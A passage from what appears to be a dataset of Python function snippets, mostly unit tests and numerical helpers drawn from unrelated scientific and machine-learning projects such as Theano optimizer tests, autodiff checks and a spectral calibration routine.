0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def test_COPYxi():\n\tk, outputs = 2, [0,0,1,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['02'])\n\ttrue_pi1s = set(['12'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('02',[],[])]\n\ttrue_ts1s = [('12',[],[])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. %s != %s' % (ts1s,true_ts1s))", "def test_shadowing(x, y, z):\n x = x * y\n y = y * z\n z = x * z\n return x + y + z", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def test_simple_funcs(self):\r\n variables = {'x': 4.712}\r\n functions = {'id': lambda x: x}\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator(variables, functions, 'id(x)'), 4.712)\r\n\r\n functions.update({'f': numpy.sin})\r\n self.assertAlmostEqual(\r\n calc.evaluator(variables, functions, 'f(x)'),\r\n -1, delta=1e-3\r\n )", "def test_ex_2_2(self):\n wam = WAM()\n compiler = Compiler()\n X = Variable()\n Y = Variable()\n var_idxes = {}\n a1 = compiler.write_to_heap(Compound('f', X, Compound('g', X, Atom('a'))), wam, var_idxes)\n a2 = compiler.write_to_heap(Compound('f', Atom('b'), Y), wam, var_idxes)\n aX = var_idxes[X]\n aY = var_idxes[Y]\n wam.unify(a1, a2)\n self.assertEqual(wam.get_term_repr(aX), 'b')\n self.assertEqual(wam.get_term_repr(aY), 'g(b, a)')", "def test_mul_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = x**2 * y**2\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2), \n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n 4.0*1.5*2.5)", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2", "def test_bit_and_offset_out_of_range(self):\n value = bytearray()\n value.append(0)\n ops = [bitwise_operations.bit_and(self.five_255_bin, 41, 8, 1, value, None)]\n\n with pytest.raises(e.OpNotApplicable):\n self.as_connection.operate(self.test_key, ops)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def axpby(alpha,pepx1,beta,pepx2):\n\n pepx_new = add(mul(alpha,pepx1),mul(beta,pepx))\n return pepx_new", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def CalcGreenFunctions(x, y, z, x_src_l, y_src_l, alpha, dire, Lambda_y, \\\n gamma_l, c, omega, G_sen, dir_meas, dir_meas_deg, airloss_alpha, f, n):\n \n G = greens_fct(repmat(x_src_l, np.shape(x)[0],1), repmat(y_src_l, np.shape(y)[0],1), omega, c, \\\n np.transpose(repmat(x, np.shape(x_src_l)[0], 1)), np.transpose(repmat(y, np.shape(y_src_l)[0], 1)), z)\n\n G = G_sen * G\n \n beta = np.arcsin((np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1)) \\\n * np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - \\\n repmat(x_src_l, np.shape(x)[0], 1))**2 + \\\n (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)**(-1)) \\\n + repmat(gamma_l, np.shape(x)[0], 1)\n \n # air attenuation\n src_rec_dist = np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - repmat(x_src_l, np.shape(x)[0], 1))**2 \\\n + (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)\n \n air_att = airloss_alpha * src_rec_dist\n air_att = 10**(-air_att / 20)\n G = G * air_att\n \n H_post = calc_directivity(dire, alpha, Lambda_y, beta, omega, c, f, dir_meas, dir_meas_deg, n)\n\n G = G * H_post\n \n return G", "def test_sum_pos_2() -> None:\n # Note: We take 1 step (first item) - thus end up on square 2\n # (square 1 being home).\n assert nth(sw.sum_walk(), 0) == 1", "def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False", "def test_member_input_flags(self):\r\n\r\n if config.mode == 'FAST_COMPILE':\r\n return\r\n\r\n M = Module()\r\n M.x = T.dvector()\r\n M.y = T.dvector()\r\n xval= numpy.asarray([0, 0.5])\r\n M.f = Method([io.In(M.x,\r\n mutable=True,\r\n update=(M.x - M.y),\r\n value=xval)], M.x + M.y)\r\n m = M.make()\r\n m.y = numpy.asarray([1, 2])\r\n\r\n assert numpy.all(m.f(xval) == [1, 2.5])\r\n assert numpy.all(xval == [-1, -1.5])", "def check_affine_equivalence(f, g, A, a, B, b):\n for x in range(0, 2**N):\n y = oplus(x, a)\n y = apply_bin_mat(y, A)\n y = g[y]\n y = apply_bin_mat(y, B)\n y = oplus(y, b)\n if y != f[x]:\n return False\n return True", "def f_raw(x, a, b):\n return a * x + b", "def test_function2(a, b):\n x = a + b\n y = a * b\n return x, y, x<y, x>y # < to ensure HTML is properly escaped", "def test_k_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n ki = k_index(pressure, temperature, dewpoint)\n assert_almost_equal(ki, 33.5 * units.degC, 2)", "def test_1d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(x):\n return [x**2, x]\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [2**2, 2])\n \n a = func(1)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def mul_fns(f_and_df, g_and_dg):\n \"*** YOUR CODE HERE ***\"", "def find_caliblamp_offset(spec1, spec2, colname1='flux', colname2='flux',\n aperture_k=None, pixel_k=None, pixel_range=(-30, 30),\n max_order_offset=20,\n mode='normal'):\n\n if isinstance(pixel_range, int) or isinstance(pixel_range, float):\n if pixel_range <=0:\n print('Error: pixel_range must be positive')\n raise ValueError\n pixel_range = int(pixel_range)\n pixel_shift_lst = np.arange(-pixel_range, pixel_range)\n elif isinstance(pixel_range, list) or isinstance(pixel_range, tuple):\n if len(pixel_range)<2:\n print('Error: pixel_range must have length of 2')\n raise ValueError\n if pixel_range[0] >= pixel_range[1]:\n print('Error: pixel_range error')\n raise ValueError\n pixel_shift_lst = np.arange(pixel_range[0], pixel_range[1])\n else:\n pass\n\n if mode=='debug':\n dbgpath = 'debug'\n if not os.path.exists(dbgpath):\n os.mkdir(dbgpath)\n plot_ccf = True\n plot_scatter = True\n figname_ccf = os.path.join(dbgpath,\n 'lamp_ccf_{:+2d}_{:+03d}.png')\n figname_scatter = os.path.join(dbgpath,\n 'lamp_ccf_scatter.png')\n else:\n plot_ccf = False\n plot_scatter = False\n\n mean_lst = {(1, 1):[], (1, -1):[], (-1, 1):[], (-1, -1):[]}\n scatter_lst = {(1, 1):[], (1, -1):[], (-1, 1):[], (-1, -1):[]}\n all_scatter_lst = []\n all_mean_lst = []\n scatter_id_lst = []\n\n aper1_lst = spec1['aperture']\n aper2_lst = spec2['aperture']\n min_aper1 = aper1_lst.min()\n max_aper1 = aper1_lst.max()\n min_aper2 = aper2_lst.min()\n max_aper2 = aper2_lst.max()\n\n # determine the maxium absolute offsets between the orders of the two\n # spectra\n maxoff = min(max(aper1_lst.size, aper2_lst.size)//2, max_order_offset)\n aperture_offset_lst = np.arange(-maxoff, maxoff)\n\n def get_aper2(aper1, k, offset):\n if k == 1:\n # (aper2 - min_aper2) = (aper1 - min_aper1) + offset\n # in this case, real_offset = offset - min_aper1 + min_aper2\n aper2 = (aper1 - min_aper1) + offset + min_aper2\n elif k == -1:\n # (aper2 - min_aper2) = -(aper1 - max_aper1) + offset\n # in this cose, real_offset = offset + max_aper1 + min_aper2\n aper2 = -aper1 + max_aper1 + offset + min_aper2\n else:\n raise ValueError\n return aper2\n\n # aperture_k = 1: same cross-order direction;\n # -1: reverse cross-order direction.\n if aperture_k is None:\n search_aperture_k_lst = [1, -1]\n elif aperture_k in [1, -1]:\n search_aperture_k_lst = [aperture_k]\n else:\n print('Warning: Unknown aperture_k:', aperture_k)\n raise ValueError\n\n # pixel_k = 1: same main-dispersion direction;\n # -1: reverse main-dispersion direction.\n if pixel_k is None:\n search_pixel_k_lst = [1, -1]\n elif pixel_k in [1, -1]:\n search_pixel_k_lst = [pixel_k]\n else:\n print('Warning: Unknown pixel_k:', pixel_k)\n raise ValueError\n\n\n for aperture_k in search_aperture_k_lst:\n for aperture_offset in aperture_offset_lst:\n calc_pixel_shift_lst = {1: [], -1: []}\n if plot_ccf:\n fig2 = plt.figure(figsize=(10,8), dpi=150)\n axes2 = { 1: fig2.add_subplot(211),\n -1: fig2.add_subplot(212),\n }\n for row1 in spec1:\n aperture1 = row1['aperture']\n aperture2 = get_aper2(aperture1, aperture_k, aperture_offset)\n m = spec2['aperture'] == aperture2\n if m.sum()==0:\n continue\n row2 = spec2[m][0]\n flux1 = row1[colname1]\n flux2 = row2[colname2]\n for pixel_k in search_pixel_k_lst:\n '''\n if aperture_k == -1 and pixel_k == -1:\n fig1 = plt.figure(dpi=150)\n ax1 = fig1.gca()\n ax1.plot(flux1[::pixel_k], 'C0')\n ax1.plot(flux2, 'C1')\n ax1.set_title('Aper1 = %d, Aper2 = %d (%d, %d, %d)'%(\n aperture1, aperture2, aperture_k, aperture_offset,\n pixel_k))\n fig1.savefig('check_%d_%d_%d_%02d_%02d_.png'%(\n aperture_k, aperture_offset, pixel_k, aperture1,\n aperture2))\n plt.close(fig1)\n '''\n\n ccf_lst = get_simple_ccf(flux1[::pixel_k], flux2,\n pixel_shift_lst)\n # find the pixel shift\n calc_shift = pixel_shift_lst[ccf_lst.argmax()]\n # pack the pixel shift into a list\n calc_pixel_shift_lst[pixel_k].append(calc_shift)\n\n if plot_ccf:\n axes2[pixel_k].plot(pixel_shift_lst, ccf_lst, alpha=0.4)\n # pixel direction loop ends here\n # order-by-order loop ends here\n\n # adjust the ccf figure and save\n if plot_ccf:\n for ax in axes2.values():\n ax.set_xlim(pixel_shift_lst[0], pixel_shift_lst[-1])\n fig2.savefig(figname_ccf.format(aperture_k, aperture_offset))\n plt.close(fig2)\n\n # convert calc_pixel_shift_lst to numpy array\n pixel_shift_mean = {1: None, -1: None}\n pixel_shift_std = {1: None, -1: None}\n for pixel_k in search_pixel_k_lst:\n tmp = np.array(calc_pixel_shift_lst[pixel_k])\n\n mean = tmp.mean()\n std = tmp.std()\n\n mean_lst[(aperture_k, pixel_k)].append(mean)\n scatter_lst[(aperture_k, pixel_k)].append(std)\n\n # used to search the global minimum shift scatter along all the\n # (aperture_k, aperture_offset, pixel_k) space\n all_mean_lst.append(mean)\n all_scatter_lst.append(std)\n scatter_id_lst.append((aperture_k, aperture_offset, pixel_k))\n\n # direction loop ends here\n\n # plot the scatters of peaks and save it as a figure file\n if plot_scatter:\n fig3 = plt.figure(dpi=150, figsize=(8,6))\n ax3 = fig3.gca()\n for key, scatters in scatter_lst.items():\n aperture_k, pixel_k = key\n if len(scatters)==0:\n continue\n ax3.plot(aperture_offset_lst, scatters,\n color = {1:'C0', -1:'C1'}[aperture_k],\n ls = {1:'-', -1:'--'}[pixel_k],\n label = 'Aperture k = {}, Pixel k = {}'.format(\n aperture_k, pixel_k))\n ax3.set_xlabel('Aperture Offset')\n ax3.set_ylabel('Scatter (pixel)')\n ax3.legend(loc='lower right')\n fig3.savefig(figname_scatter)\n plt.close(fig3)\n\n imin = np.argmin(all_scatter_lst)\n scatter_id = scatter_id_lst[imin]\n result_aperture_k = scatter_id[0]\n result_aperture_offset = scatter_id[1]\n result_pixel_k = scatter_id[2]\n result_pixel_offset = all_mean_lst[imin]\n\n # convert aperture_offset to real aperture_offset\n real_aperture_offset = {\n 1: result_aperture_offset - min_aper1 + min_aper2,\n -1: result_aperture_offset + max_aper1 + min_aper2,\n }[result_aperture_k]\n return (result_aperture_k, real_aperture_offset,\n result_pixel_k, result_pixel_offset)", "def indmatch(ra1, dec1, ra2, dec2, tol):\n m = match(ra1, dec1, ra2, dec2, tol)\n c = m.ind > -1\n i1 = c.nonzero()[0]\n i2 = m.ind[c]\n return i1, i2", "def test_OR():\n\tk, outputs = 2, [0,1,1,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['00'])\n\ttrue_pi1s = set(['12','21'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('00',[],[[0,1]])]\n\ttrue_ts1s = [('12',[[0,1]],[])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. %s != %s' % (ts1s,true_ts1s))", "def __symbols_are_close_in_equation(symbol_1_indices, symbol_2_indices):\n\n for index_1 in symbol_1_indices:\n for index_2 in symbol_2_indices:\n if index_1 == index_2 + 1:\n return index_2, index_1\n elif index_2 == index_1 + 1:\n return index_1, index_2\n return -1, -1", "def expected(x, y):", "def expected(x, y):", "def expected(x, y):", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n 